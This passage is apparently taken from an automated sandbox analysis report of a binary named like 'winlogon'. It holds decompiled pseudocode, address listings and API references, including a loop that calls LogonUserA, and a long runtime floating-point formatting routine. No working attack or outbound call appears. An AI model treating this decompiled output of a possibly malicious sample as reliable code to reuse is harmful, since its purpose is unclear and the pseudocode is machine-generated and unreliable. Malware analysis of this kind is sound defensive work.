															} while (_t69 != 0);
															_t117 = _t116 - _t140;
															_t130 =  &_v280 - 1;
															do {
																_t70 =  *(_t130 + 1);
																_t130 = _t130 + 1;
															} while (_t70 != 0);
															_t103 = _t117 >> 2;
															memcpy(_t130, _t140, _t103 << 2);
															_t106 = _t117 & 0x00000003;
															_t73 = memcpy(_t140 + _t103 + _t103, _t140, _t117 & 0x00000003);
															_t143 = _t146 + 0x18;
															E00D62540(_t82, _v556, _t140 + (_t117 & 0x00000003) + _t106, _t73);
															_t121 = _v560;
															goto L32;
														}
													}
												}
											}
										}
									}
								}
								goto L36;
								L32:
								_t82 = _t82 + 1;
								_t92 = _v596;
								_t113 = _v540 + 0x200;
								_t55 = _v592 - _t92 >> 9;
								_v540 = _t113;
							} while (_t82 < _t55);
						}
						goto L33;
					}
				}
				L36:
				 *[fs:0x0] = _v16;
				return E00D6ABE4(_v24 ^ _t141);
			}





















































    0x00d63920
    0x00d63923
    0x00d63925
    0x00d63930
    0x00d63931
    0x00d63937
    0x00d6393c
    0x00d6393e
    0x00d63941
    0x00d63944
    0x00d63948
    0x00d63950
    0x00d63958
    0x00d6395e
    0x00d63961
    0x00d63964
    0x00d63967
    0x00d6396d
    0x00d63975
    0x00d639a1
    0x00d639a8
    0x00d639b5
    0x00d639c0
    0x00d639c8
    0x00d639cd
    0x00d63b3d
    0x00d63b43
    0x00d63b4a
    0x00d63b56
    0x00d639d3
    0x00d639d3
    0x00d639d7
    0x00d639dd
    0x00d639df
    0x00d639e5
    0x00d639eb
    0x00d639fe
    0x00000000
    0x00d639f1
    0x00d639f3
    0x00d63b62
    0x00d63b67
    0x00000000
    0x00d639f9
    0x00d639f9
    0x00d63a00
    0x00d63a00
    0x00d63a05
    0x00d63a05
    0x00d63a0b
    0x00d63a0f
    0x00d63a14
    0x00d63a19
    0x00d63a25
    0x00d63a42
    0x00d63a46
    0x00000000
    0x00d63a48
    0x00d63a48
    0x00000000
    0x00d63a48
    0x00d63a1b
    0x00d63a1b
    0x00d63a4e
    0x00d63a50
    0x00000000
    0x00d63a56
    0x00d63a56
    0x00d63a64
    0x00d63a69
    0x00d63a6f
    0x00d63a72
    0x00d63a74
    0x00d63a74
    0x00d63a76
    0x00d63a77
    0x00d63a81
    0x00d63a83
    0x00d63a84
    0x00d63a84
    0x00d63a87
    0x00d63a88
    0x00d63a8e
    0x00d63a98
    0x00d63a98
    0x00d63aa0
    0x00d63ac9
    0x00d63ac9
    0x00000000
    0x00d63aa2
    0x00d63aa8
    0x00d63ab0
    0x00d63ab5
    0x00000000
    0x00d63ab7
    0x00d63ab9
    0x00000000
    0x00d63abf
    0x00d63ac5
    0x00d63acb
    0x00d63acb
    0x00d63ad1
    0x00d63ad3
    0x00d63ad3
    0x00d63ad5
    0x00d63ad6
    0x00d63ae0
    0x00d63ae2
    0x00d63ae3
    0x00d63ae3
    0x00d63ae6
    0x00d63ae7
    0x00d63af3
    0x00d63af6
    0x00d63afa
    0x00d63afd
    0x00d63afd
    0x00d63b06
    0x00d63b0b
    0x00000000
    0x00d63b0b
    0x00d63ab9
    0x00d63ab5
    0x00d63aa0
    0x00d63a50
    0x00d63a19
    0x00d639f3
    0x00000000
    0x00d63b11
    0x00d63b17
    0x00d63b18
    0x00d63b26
    0x00d63b2c
    0x00d63b2f
    0x00d63b35
    0x00d639e5
    0x00000000
    0x00d639d7
    0x00d639cd
    0x00d63b6e
    0x00d63b71
    0x00d63b89

    APIs
    • LogonUserA.ADVAPI32(?,?,?,00000003,00000000,?), ref: 00D63A3C
    • GetLastError.KERNEL32(?,00000003,00000000,?,276B9783), ref: 00D63A48
    • DeleteCriticalSection.KERNEL32(?,276B9783), ref: 00D63B4A
      • Part of subcall function 00D6B97B: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00D6B987
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
      • Part of subcall function 00D61F60: InitializeCriticalSection.KERNEL32(?,?,00D639A6,276B9783), ref: 00D61F7B
      • Part of subcall function 00D636A0: __Stoull.NTSTC_LIBCMT ref: 00D63855
      • Part of subcall function 00D636A0: __Stoull.NTSTC_LIBCMT ref: 00D63872
    Strings
    • invalid vector<T> subscript, xrefs: 00D63B62
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D7989E, Relevance: 6.4, Strings: 4, Instructions: 1381Crypto
    C-Code - Quality: 77%
    			E00D7989E(void* __ebx, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr* _a16, signed int _a20, intOrPtr _a24) {
				signed int _v0;
				signed int _v8;
				char _v460;
				signed int _v464;
				void _v468;
				signed int _v472;
				signed int _v932;
				signed int _v936;
				signed int _v1392;
				signed int _v1396;
				signed int _v1400;
				char _v1860;
				signed int _v1864;
				signed int _v1865;
				signed int _v1872;
				signed int _v1876;
				signed int _v1880;
				signed int _v1884;
				signed int _v1888;
				signed int _v1892;
				signed int _v1896;
				intOrPtr _v1900;
				signed int _v1904;
				signed int _v1908;
				signed int _v1912;
				signed int _v1916;
				signed int _v1920;
				signed int _v1924;
				signed int _v1928;
				char _v1936;
				char _v1944;
				char _v2404;
				signed int _v2408;
				signed int _v2424;
				void* __edi;
				void* __esi;
				signed int _t725;
				signed int _t735;
				signed int _t736;
				signed int _t740;
				intOrPtr _t742;
				intOrPtr* _t743;
				intOrPtr* _t746;
				signed int _t751;
				signed int _t752;
				signed int _t758;
				signed int _t764;
				intOrPtr _t766;
				void* _t767;
				signed int _t768;
				signed int _t769;
				signed int _t770;
				signed int _t778;
				signed int _t779;
				signed int _t782;
				signed int _t783;
				signed int _t784;
				signed int _t787;
				signed int _t788;
				signed int _t789;
				signed int _t791;
				signed int _t792;
				signed int _t793;
				signed int _t794;
				signed int _t799;
				signed int _t800;
				signed int _t805;
				signed int _t806;
				signed int _t809;
				signed int _t813;
				signed int _t820;
				signed int* _t823;
				signed int _t826;
				signed int _t837;
				signed int _t838;
				signed int _t840;
				char* _t841;
				signed int _t843;
				signed int _t847;
				signed int _t848;
				signed int _t852;
				signed int _t854;
				signed int _t859;
				signed int _t867;
				signed int _t870;
				signed int _t872;
				signed int _t875;
				signed int _t876;
				signed int _t877;
				signed int _t880;
				signed int _t893;
				signed int _t894;
				signed int _t896;
				char* _t897;
				signed int _t899;
				signed int _t903;
				signed int _t904;
				signed int* _t906;
				signed int _t908;
				signed int _t910;
				signed int _t915;
				signed int _t922;
				signed int _t925;
				signed int _t929;
				signed int* _t936;
				intOrPtr _t938;
				void* _t939;
				intOrPtr* _t941;
				signed int* _t945;
				unsigned int _t956;
				signed int _t957;
				void* _t960;
				signed int _t961;
				void* _t963;
				signed int _t964;
				signed int _t965;
				signed int _t966;
				signed int _t974;
				signed int _t979;
				signed int _t982;
				unsigned int _t985;
				signed int _t986;
				void* _t989;
				signed int _t990;
				void* _t992;
				signed int _t993;
				signed int _t994;
				signed int _t995;
				signed int _t999;
				signed int* _t1004;
				signed int _t1006;
				signed int _t1016;
				void _t1019;
				signed int _t1022;
				void* _t1025;
				signed int _t1036;
				signed int _t1037;
				signed int _t1040;
				signed int _t1041;
				signed int _t1043;
				signed int _t1044;
				signed int _t1045;
				signed int _t1049;
				signed int _t1053;
				signed int _t1054;
				signed int _t1055;
				signed int _t1057;
				signed int _t1058;
				signed int _t1059;
				signed int _t1060;
				signed int _t1061;
				signed int _t1062;
				signed int _t1064;
				signed int _t1065;
				signed int _t1066;
				signed int _t1067;
				signed int _t1068;
				signed int _t1069;
				unsigned int _t1070;
				void* _t1073;
				intOrPtr _t1075;
				signed int _t1076;
				signed int _t1077;
				signed int _t1078;
				signed int* _t1082;
				void* _t1086;
				void* _t1087;
				signed int _t1088;
				signed int _t1089;
				signed int _t1090;
				signed int _t1093;
				signed int _t1094;
				signed int _t1099;
				signed int _t1101;
				signed int _t1104;
				char _t1109;
				signed int _t1111;
				signed int _t1112;
				signed int _t1113;
				signed int _t1114;
				signed int _t1115;
				signed int _t1116;
				signed int _t1117;
				signed int _t1121;
				signed int _t1122;
				signed int _t1123;
				signed int _t1124;
				signed int _t1125;
				unsigned int _t1128;
				void* _t1132;
				void* _t1133;
				unsigned int _t1134;
				signed int _t1139;
				signed int _t1140;
				signed int _t1142;
				signed int _t1143;
				intOrPtr* _t1145;
				signed int _t1146;
				signed int _t1147;
				signed int _t1150;
				signed int _t1151;
				signed int _t1154;
				signed int _t1156;
				signed int _t1157;
				void* _t1158;
				signed int _t1159;
				signed int _t1160;
				signed int _t1161;
				void* _t1164;
				signed int _t1165;
				signed int _t1166;
				signed int _t1167;
				signed int _t1168;
				signed int _t1169;
				signed int* _t1172;
				signed int _t1173;
				signed int _t1174;
				signed int _t1175;
				signed int _t1176;
				intOrPtr* _t1178;
				intOrPtr* _t1179;
				signed int _t1181;
				signed int _t1183;
				signed int _t1186;
				signed int _t1192;
				signed int _t1196;
				signed int _t1197;
				intOrPtr _t1199;
				intOrPtr _t1200;
				signed int _t1205;
				signed int _t1208;
				signed int _t1209;
				signed int _t1210;
				signed int _t1211;
				signed int _t1212;
				signed int _t1213;
				signed int _t1215;
				signed int _t1216;
				signed int _t1217;
				signed int _t1218;
				signed int _t1220;
				signed int _t1221;
				signed int _t1222;
				signed int _t1223;
				signed int _t1224;
				signed int _t1226;
				signed int _t1227;
				signed int _t1229;
				signed int _t1231;
				signed int _t1233;
				signed int _t1235;
				signed int* _t1237;
				signed int* _t1241;
				signed int _t1250;

				_t725 =  *0xd88004; // 0x276b9783
				_v8 = _t725 ^ _t1235;
				_t1016 = _a20;
				_t1145 = _a16;
				_v1924 = _t1145;
				_v1920 = _t1016;
				E00D793BA( &_v1944, __eflags);
				_t1196 = _a8;
				_t730 = 0x2d;
				if((_t1196 & 0x80000000) == 0) {
					_t730 = 0x120;
				}
				 *_t1145 = _t730;
				 *((intOrPtr*)(_t1145 + 8)) = _t1016;
				_t1146 = _a4;
				if((_t1196 & 0x7ff00000) != 0) {
					L5:
					_t735 = E00D7401F( &_a4);
					_pop(_t1031);
					__eflags = _t735;
					if(_t735 != 0) {
						_t1031 = _v1924;
						 *((intOrPtr*)(_v1924 + 4)) = 1;
					}
					_t736 = _t735 - 1;
					__eflags = _t736;
					if(_t736 == 0) {
						_push("1#INF");
						goto L308;
					} else {
						_t751 = _t736 - 1;
						__eflags = _t751;
						if(_t751 == 0) {
							_push("1#QNAN");
							goto L308;
						} else {
							_t752 = _t751 - 1;
							__eflags = _t752;
							if(_t752 == 0) {
								_push("1#SNAN");
								goto L308;
							} else {
								__eflags = _t752 == 1;
								if(_t752 == 1) {
									_push("1#IND");
									goto L308;
								} else {
									_v1928 = _v1928 & 0x00000000;
									_a4 = _t1146;
									_a8 = _t1196 & 0x7fffffff;
									_t1250 = _a4;
									asm("fst qword [ebp-0x768]");
									_t1150 = _v1896;
									_v1916 = _a12 + 1;
									_t1036 = _t1150 >> 0x14;
									_t758 = _t1036 & 0x000007ff;
									__eflags = _t758;
									if(_t758 != 0) {
										_t1101 = 0;
										_t758 = 0;
										__eflags = 0;
									} else {
										_t1101 = 1;
									}
									_t1151 = _t1150 & 0x000fffff;
									_t1019 = _v1900 + _t758;
									asm("adc edi, esi");
									__eflags = _t1101;
									_t1037 = _t1036 & 0x000007ff;
									_t1205 = _t1037 - 0x434 + (0 | _t1101 != 0x00000000) + 1;
									_v1872 = _t1205;
									E00D7B760(_t1037, _t1250);
									_push(_t1037);
									_push(_t1037);
									 *_t1237 = _t1250;
									_t764 = E00D7DA20(E00D7B870(_t1151, _t1205), _t1250);
									_v1904 = _t764;
									__eflags = _t764 - 0x7fffffff;
									if(_t764 == 0x7fffffff) {
										L16:
										__eflags = 0;
										_v1904 = 0;
									} else {
										__eflags = _t764 - 0x80000000;
										if(_t764 == 0x80000000) {
											goto L16;
										}
									}
									_v468 = _t1019;
									__eflags = _t1151;
									_v464 = _t1151;
									_t1022 = (0 | _t1151 != 0x00000000) + 1;
									_v472 = _t1022;
									__eflags = _t1205;
									if(_t1205 < 0) {
										__eflags = _t1205 - 0xfffffc02;
										if(_t1205 == 0xfffffc02) {
											L101:
											_t766 =  *((intOrPtr*)(_t1235 + _t1022 * 4 - 0x1d4));
											_t195 =  &_v1896;
											 *_t195 = _v1896 & 0x00000000;
											__eflags =  *_t195;
											asm("bsr eax, eax");
											if( *_t195 == 0) {
												_t1040 = 0;
												__eflags = 0;
											} else {
												_t1040 = _t766 + 1;
											}
											_t767 = 0x20;
											_t768 = _t767 - _t1040;
											__eflags = _t768 - 1;
											_t769 = _t768 & 0xffffff00 | _t768 - 0x00000001 > 0x00000000;
											__eflags = _t1022 - 0x73;
											_v1865 = _t769;
											_t1041 = _t1040 & 0xffffff00 | _t1022 - 0x00000073 > 0x00000000;
											__eflags = _t1022 - 0x73;
											if(_t1022 != 0x73) {
												L107:
												_t770 = 0;
												__eflags = 0;
											} else {
												__eflags = _t769;
												if(_t769 == 0) {
													goto L107;
												} else {
													_t770 = 1;
												}
											}
											__eflags = _t1041;
											if(_t1041 != 0) {
												L126:
												_v1400 = _v1400 & 0x00000000;
												_t224 =  &_v472;
												 *_t224 = _v472 & 0x00000000;
												__eflags =  *_t224;
												_push(0);
												_push( &_v1396);
												_push(0x1cc);
												_push( &_v468);
												L313();
												_t1237 =  &(_t1237[4]);
											} else {
												__eflags = _t770;
												if(_t770 != 0) {
													goto L126;
												} else {
													_t1068 = 0x72;
													__eflags = _t1022 - _t1068;
													if(_t1022 < _t1068) {
														_t1068 = _t1022;
													}
													__eflags = _t1068 - 0xffffffff;
													if(_t1068 != 0xffffffff) {
														_t1223 = _t1068;
														_t1178 =  &_v468 + _t1068 * 4;
														_v1880 = _t1178;
														while(1) {
															__eflags = _t1223 - _t1022;
															if(_t1223 >= _t1022) {
																_t208 =  &_v1876;
																 *_t208 = _v1876 & 0x00000000;
																__eflags =  *_t208;
															} else {
																_v1876 =  *_t1178;
															}
															_t210 = _t1223 - 1; // 0x70
															__eflags = _t210 - _t1022;
															if(_t210 >= _t1022) {
																_t1128 = 0;
																__eflags = 0;
															} else {
																_t1128 =  *(_t1178 - 4);
															}
															_t1178 = _t1178 - 4;
															_t936 = _v1880;
															_t1223 = _t1223 - 1;
															 *_t936 = _t1128 >> 0x0000001f ^ _v1876 + _v1876;
															_v1880 = _t936 - 4;
															__eflags = _t1223 - 0xffffffff;
															if(_t1223 == 0xffffffff) {
																break;
															}
															_t1022 = _v472;
														}
														_t1205 = _v1872;
													}
													__eflags = _v1865;
													if(_v1865 == 0) {
														_v472 = _t1068;
													} else {
														_t218 = _t1068 + 1; // 0x73
														_v472 = _t218;
													}
												}
											}
											_t1154 = 1 - _t1205;
											E00D6D520(_t1154,  &_v1396, 0, 1);
											__eflags = 1;
											 *(_t1235 + 0xbad63d) = 1 << (_t1154 & 0x0000001f);
											_t778 = 0xbadbae;
										} else {
											_v1396 = _v1396 & 0x00000000;
											_t1069 = 2;
											_v1392 = 0x100000;
											_v1400 = _t1069;
											__eflags = _t1022 - _t1069;
											if(_t1022 == _t1069) {
												_t1132 = 0;
												__eflags = 0;
												while(1) {
													_t938 =  *((intOrPtr*)(_t1235 + _t1132 - 0x570));
													__eflags = _t938 -  *((intOrPtr*)(_t1235 + _t1132 - 0x1d0));
													if(_t938 !=  *((intOrPtr*)(_t1235 + _t1132 - 0x1d0))) {
														goto L101;
													}
													_t1132 = _t1132 + 4;
													__eflags = _t1132 - 8;
													if(_t1132 != 8) {
														continue;
													} else {
														_t166 =  &_v1896;
														 *_t166 = _v1896 & 0x00000000;
														__eflags =  *_t166;
														asm("bsr eax, edi");
														if( *_t166 == 0) {
															_t1133 = 0;
															__eflags = 0;
														} else {
															_t1133 = _t938 + 1;
														}
														_t939 = 0x20;
														_t1224 = _t1069;
														__eflags = _t939 - _t1133 - _t1069;
														_t941 =  &_v460;
														_v1880 = _t941;
														_t1179 = _t941;
														_t171 =  &_v1865;
														 *_t171 = _t939 - _t1133 - _t1069 > 0;
														__eflags =  *_t171;
														while(1) {
															__eflags = _t1224 - _t1022;
															if(_t1224 >= _t1022) {
																_t173 =  &_v1876;
																 *_t173 = _v1876 & 0x00000000;
																__eflags =  *_t173;
															} else {
																_v1876 =  *_t1179;
															}
															_t175 = _t1224 - 1; // 0x0
															__eflags = _t175 - _t1022;
															if(_t175 >= _t1022) {
																_t1134 = 0;
																__eflags = 0;
															} else {
																_t1134 =  *(_t1179 - 4);
															}
															_t1179 = _t1179 - 4;
															_t945 = _v1880;
															_t1224 = _t1224 - 1;
															 *_t945 = _t1134 >> 0x0000001e ^ _v1876 << 0x00000002;
															_v1880 = _t945 - 4;
															__eflags = _t1224 - 0xffffffff;
															if(_t1224 == 0xffffffff) {
																break;
															}
															_t1022 = _v472;
														}
														__eflags = _v1865;
														_t1070 = _t1069 - _v1872;
														_v472 = (0 | _v1865 != 0x00000000) + _t1069;
														_t1181 = _t1070 >> 5;
														_v1884 = _t1070;
														_t1226 = _t1181 << 2;
														E00D6D520(_t1181,  &_v1396, 0, _t1226);
														 *(_t1235 + _t1226 - 0x570) = 1 << (_v1884 & 0x0000001f);
														_t778 = _t1181 + 1;
													}
													goto L128;
												}
											}
											goto L101;
										}
										L128:
										_v1400 = _t778;
										_t1025 = 0x1cc;
										_v936 = _t778;
										_t779 = _t778 << 2;
										__eflags = _t779;
										_push(_t779);
										_push( &_v1396);
										_push(0x1cc);
										_push( &_v932);
										L313();
										_t1241 =  &(_t1237[7]);
									} else {
										_v1396 = _v1396 & 0x00000000;
										_t1227 = 2;
										_v1392 = 0x100000;
										_v1400 = _t1227;
										__eflags = _t1022 - _t1227;
										if(_t1022 != _t1227) {
											L53:
											_t956 = _v1872 + 1;
											_t957 = _t956 & 0x0000001f;
											_t1073 = 0x20;
											_v1876 = _t957;
											_t1183 = _t956 >> 5;
											_v1872 = _t1183;
											_v1908 = _t1073 - _t957;
											_t960 = E00D7DA00(1, _t1073 - _t957, 0);
											_t1075 =  *((intOrPtr*)(_t1235 + _t1022 * 4 - 0x1d4));
											_t961 = _t960 - 1;
											_t108 =  &_v1896;
											 *_t108 = _v1896 & 0x00000000;
											__eflags =  *_t108;
											asm("bsr ecx, ecx");
											_v1884 = _t961;
											_v1912 =  !_t961;
											if( *_t108 == 0) {
												_t1076 = 0;
												__eflags = 0;
											} else {
												_t1076 = _t1075 + 1;
											}
											_t963 = 0x20;
											_t964 = _t963 - _t1076;
											_t1139 = _t1022 + _t1183;
											__eflags = _v1876 - _t964;
											_v1892 = _t1139;
											_t965 = _t964 & 0xffffff00 | _v1876 - _t964 > 0x00000000;
											__eflags = _t1139 - 0x73;
											_v1865 = _t965;
											_t1077 = _t1076 & 0xffffff00 | _t1139 - 0x00000073 > 0x00000000;
											__eflags = _t1139 - 0x73;
											if(_t1139 != 0x73) {
												L59:
												_t966 = 0;
												__eflags = 0;
											} else {
												__eflags = _t965;
												if(_t965 == 0) {
													goto L59;
												} else {
													_t966 = 1;
												}
											}
											__eflags = _t1077;
											if(_t1077 != 0) {
												L81:
												__eflags = 0;
												_t1025 = 0x1cc;
												_push(0);
												_v1400 = 0;
												_v472 = 0;
												_push( &_v1396);
												_push(0x1cc);
												_push( &_v468);
												L313();
												_t1237 =  &(_t1237[4]);
											} else {
												__eflags = _t966;
												if(_t966 != 0) {
													goto L81;
												} else {
													_t1078 = 0x72;
													__eflags = _t1139 - _t1078;
													if(_t1139 >= _t1078) {
														_t1139 = _t1078;
														_v1892 = _t1078;
													}
													_t974 = _t1139;
													_v1880 = _t974;
													__eflags = _t1139 - 0xffffffff;
													if(_t1139 != 0xffffffff) {
														_t1140 = _v1872;
														_t1229 = _t1139 - _t1140;
														__eflags = _t1229;
														_t1082 =  &_v468 + _t1229 * 4;
														_v1888 = _t1082;
														while(1) {
															__eflags = _t974 - _t1140;
															if(_t974 < _t1140) {
																break;
															}
															__eflags = _t1229 - _t1022;
															if(_t1229 >= _t1022) {
																_t1186 = 0;
																__eflags = 0;
															} else {
																_t1186 =  *_t1082;
															}
															__eflags = _t1229 - 1 - _t1022;
															if(_t1229 - 1 >= _t1022) {
																_t979 = 0;
																__eflags = 0;
															} else {
																_t979 =  *(_t1082 - 4);
															}
															_t982 = _v1880;
															_t1082 = _v1888 - 4;
															_v1888 = _t1082;
															 *(_t1235 + _t982 * 4 - 0x1d0) = (_t1186 & _v1884) << _v1876 | (_t979 & _v1912) >> _v1908;
															_t974 = _t982 - 1;
															_t1229 = _t1229 - 1;
															_v1880 = _t974;
															__eflags = _t974 - 0xffffffff;
															if(_t974 != 0xffffffff) {
																_t1022 = _v472;
																continue;
															}
															break;
														}
														_t1139 = _v1892;
														_t1183 = _v1872;
														_t1227 = 2;
													}
													__eflags = _t1183;
													if(_t1183 != 0) {
														__eflags = 0;
														memset( &_v468, 0, _t1183 << 2);
														_t1237 =  &(_t1237[3]);
													}
													__eflags = _v1865;
													_t1025 = 0x1cc;
													if(_v1865 == 0) {
														_v472 = _t1139;
													} else {
														_v472 = _t1139 + 1;
													}
												}
											}
											_v1392 = _v1392 & 0x00000000;
											_v1396 = _t1227;
											_v1400 = 1;
											_v936 = 1;
											_push(4);
										} else {
											_t1086 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *((intOrPtr*)(_t1235 + _t1086 - 0x570)) -  *((intOrPtr*)(_t1235 + _t1086 - 0x1d0));
												if( *((intOrPtr*)(_t1235 + _t1086 - 0x570)) !=  *((intOrPtr*)(_t1235 + _t1086 - 0x1d0))) {
													goto L53;
												}
												_t1086 = _t1086 + 4;
												__eflags = _t1086 - 8;
												if(_t1086 != 8) {
													continue;
												} else {
													_t985 = _v1872 + 2;
													_t986 = _t985 & 0x0000001f;
													_t1087 = 0x20;
													_t1088 = _t1087 - _t986;
													_v1888 = _t986;
													_t1231 = _t985 >> 5;
													_v1876 = _t1231;
													_v1908 = _t1088;
													_t989 = E00D7DA00(1, _t1088, 0);
													_v1896 = _v1896 & 0x00000000;
													_t990 = _t989 - 1;
													__eflags = _t990;
													asm("bsr ecx, edi");
													_v1884 = _t990;
													_v1912 =  !_t990;
													if(_t990 == 0) {
														_t1089 = 0;
														__eflags = 0;
													} else {
														_t1089 = _t1088 + 1;
													}
													_t992 = 0x20;
													_t993 = _t992 - _t1089;
													_t1142 = _t1231 + 2;
													__eflags = _v1888 - _t993;
													_v1880 = _t1142;
													_t994 = _t993 & 0xffffff00 | _v1888 - _t993 > 0x00000000;
													__eflags = _t1142 - 0x73;
													_v1865 = _t994;
													_t1090 = _t1089 & 0xffffff00 | _t1142 - 0x00000073 > 0x00000000;
													__eflags = _t1142 - 0x73;
													if(_t1142 != 0x73) {
														L28:
														_t995 = 0;
														__eflags = 0;
													} else {
														__eflags = _t994;
														if(_t994 == 0) {
															goto L28;
														} else {
															_t995 = 1;
														}
													}
													__eflags = _t1090;
													if(_t1090 != 0) {
														L50:
														__eflags = 0;
														_t1025 = 0x1cc;
														_push(0);
														_v1400 = 0;
														_v472 = 0;
														_push( &_v1396);
														_push(0x1cc);
														_push( &_v468);
														L313();
														_t1237 =  &(_t1237[4]);
													} else {
														__eflags = _t995;
														if(_t995 != 0) {
															goto L50;
														} else {
															_t1093 = 0x72;
															__eflags = _t1142 - _t1093;
															if(_t1142 >= _t1093) {
																_t1142 = _t1093;
																_v1880 = _t1093;
															}
															_t1094 = _t1142;
															_v1892 = _t1094;
															__eflags = _t1142 - 0xffffffff;
															if(_t1142 != 0xffffffff) {
																_t1143 = _v1876;
																_t1233 = _t1142 - _t1143;
																__eflags = _t1233;
																_t1004 =  &_v468 + _t1233 * 4;
																_v1872 = _t1004;
																while(1) {
																	__eflags = _t1094 - _t1143;
																	if(_t1094 < _t1143) {
																		break;
																	}
																	__eflags = _t1233 - _t1022;
																	if(_t1233 >= _t1022) {
																		_t1192 = 0;
																		__eflags = 0;
																	} else {
																		_t1192 =  *_t1004;
																	}
																	__eflags = _t1233 - 1 - _t1022;
																	if(_t1233 - 1 >= _t1022) {
																		_t1006 = 0;
																		__eflags = 0;
																	} else {
																		_t1006 =  *(_v1872 - 4);
																	}
																	_t1099 = _v1892;
																	 *(_t1235 + _t1099 * 4 - 0x1d0) = (_t1006 & _v1912) >> _v1908 | (_t1192 & _v1884) << _v1888;
																	_t1094 = _t1099 - 1;
																	_t1233 = _t1233 - 1;
																	_t1004 = _v1872 - 4;
																	_v1892 = _t1094;
																	_v1872 = _t1004;
																	__eflags = _t1094 - 0xffffffff;
																	if(_t1094 != 0xffffffff) {
																		_t1022 = _v472;
																		continue;
																	}
																	break;
																}
																_t1142 = _v1880;
																_t1231 = _v1876;
															}
															__eflags = _t1231;
															if(_t1231 != 0) {
																__eflags = 0;
																memset( &_v468, 0, _t1231 << 2);
																_t1237 =  &(_t1237[3]);
															}
															__eflags = _v1865;
															_t1025 = 0x1cc;
															if(_v1865 == 0) {
																_v472 = _t1142;
															} else {
																_v472 = _t1142 + 1;
															}
														}
													}
													_v1392 = _v1392 & 0x00000000;
													_t999 = 4;
													__eflags = 1;
													_v1396 = _t999;
													_v1400 = 1;
													_v936 = 1;
													_push(_t999);
												}
												goto L52;
											}
											goto L53;
										}
										L52:
										_push( &_v1396);
										_push(_t1025);
										_push( &_v932);
										L313();
										_t1241 =  &(_t1237[4]);
									}
									_t782 = _v1904;
									_t1043 = 0xa;
									_v1912 = _t1043;
									__eflags = _t782;
									if(_t782 < 0) {
										_t783 =  ~_t782;
										_t784 = _t783 / _t1043;
										_v1880 = _t784;
										_t1044 = _t783 % _t1043;
										_v1884 = _t1044;
										__eflags = _t784;
										if(_t784 == 0) {
											L249:
											__eflags = _t1044;
											if(_t1044 != 0) {
												_t820 =  *(0xd81dbc + _t1044 * 4);
												_v1896 = _t820;
												__eflags = _t820;
												if(_t820 == 0) {
													L260:
													__eflags = 0;
													_push(0);
													_v472 = 0;
													_v2408 = 0;
													goto L261;
												} else {
													__eflags = _t820 - 1;
													if(_t820 != 1) {
														_t1055 = _v472;
														__eflags = _t1055;
														if(_t1055 != 0) {
															_t1161 = 0;
															_t1213 = 0;
															__eflags = 0;
															do {
																_t1113 = _t820 *  *(_t1235 + _t1213 * 4 - 0x1d0) >> 0x20;
																 *(_t1235 + _t1213 * 4 - 0x1d0) = _t820 *  *(_t1235 + _t1213 * 4 - 0x1d0) + _t1161;
																_t820 = _v1896;
																asm("adc edx, 0x0");
																_t1213 = _t1213 + 1;
																_t1161 = _t1113;
																__eflags = _t1213 - _t1055;
															} while (_t1213 != _t1055);
															__eflags = _t1161;
															if(_t1161 != 0) {
																_t826 = _v472;
																__eflags = _t826 - 0x73;
																if(_t826 >= 0x73) {
																	goto L260;
																} else {
																	 *(_t1235 + _t826 * 4 - 0x1d0) = _t1161;
																	_v472 = _v472 + 1;
																}
															}
														}
													}
												}
											}
										} else {
											do {
												__eflags = _t784 - 0x26;
												if(_t784 > 0x26) {
													_t784 = 0x26;
												}
												_t1056 =  *(0xd81d26 + _t784 * 4) & 0x000000ff;
												_v1872 = _t784;
												_v1400 = ( *(0xd81d26 + _t784 * 4) & 0x000000ff) + ( *(0xd81d27 + _t784 * 4) & 0x000000ff);
												E00D6D520(_t1056 << 2,  &_v1396, 0, _t1056 << 2);
												_t837 = E00D7DAE0( &(( &_v1396)[_t1056]), 0xd81420 + ( *(0xd81d24 + _v1872 * 4) & 0x0000ffff) * 4, ( *(0xd81d27 + _t784 * 4) & 0x000000ff) << 2);
												_t1057 = _v1400;
												_t1241 =  &(_t1241[6]);
												_v1892 = _t1057;
												__eflags = _t1057 - 1;
												if(_t1057 > 1) {
													__eflags = _v472 - 1;
													if(_v472 > 1) {
														__eflags = _t1057 - _v472;
														_t1164 =  &_v1396;
														_t838 = _t837 & 0xffffff00 | _t1057 - _v472 > 0x00000000;
														__eflags = _t838;
														if(_t838 != 0) {
															_t1114 =  &_v468;
														} else {
															_t1164 =  &_v468;
															_t1114 =  &_v1396;
														}
														_v1908 = _t1114;
														__eflags = _t838;
														if(_t838 == 0) {
															_t1057 = _v472;
														}
														_v1876 = _t1057;
														__eflags = _t838;
														if(_t838 != 0) {
															_v1892 = _v472;
														}
														_t1115 = 0;
														_t1215 = 0;
														_v1864 = 0;
														__eflags = _t1057;
														if(_t1057 == 0) {
															L243:
															_v472 = _t1115;
															_t840 = _t1115 << 2;
															__eflags = _t840;
															_push(_t840);
															_t841 =  &_v1860;
															goto L244;
														} else {
															_t1165 = _t1164 -  &_v1860;
															__eflags = _t1165;
															_v1928 = _t1165;
															do {
																_t847 =  *(_t1235 + _t1165 + _t1215 * 4 - 0x740);
																_v1896 = _t847;
																__eflags = _t847;
																if(_t847 != 0) {
																	_t848 = 0;
																	_t1166 = 0;
																	_t1058 = _t1215;
																	_v1888 = 0;
																	__eflags = _v1892;
																	if(_v1892 == 0) {
																		L240:
																		__eflags = _t1058 - 0x73;
																		if(_t1058 == 0x73) {
																			goto L258;
																		} else {
																			_t1165 = _v1928;
																			_t1057 = _v1876;
																			goto L242;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1058 - 0x73;
																			if(_t1058 == 0x73) {
																				goto L235;
																			}
																			__eflags = _t1058 - _t1115;
																			if(_t1058 == _t1115) {
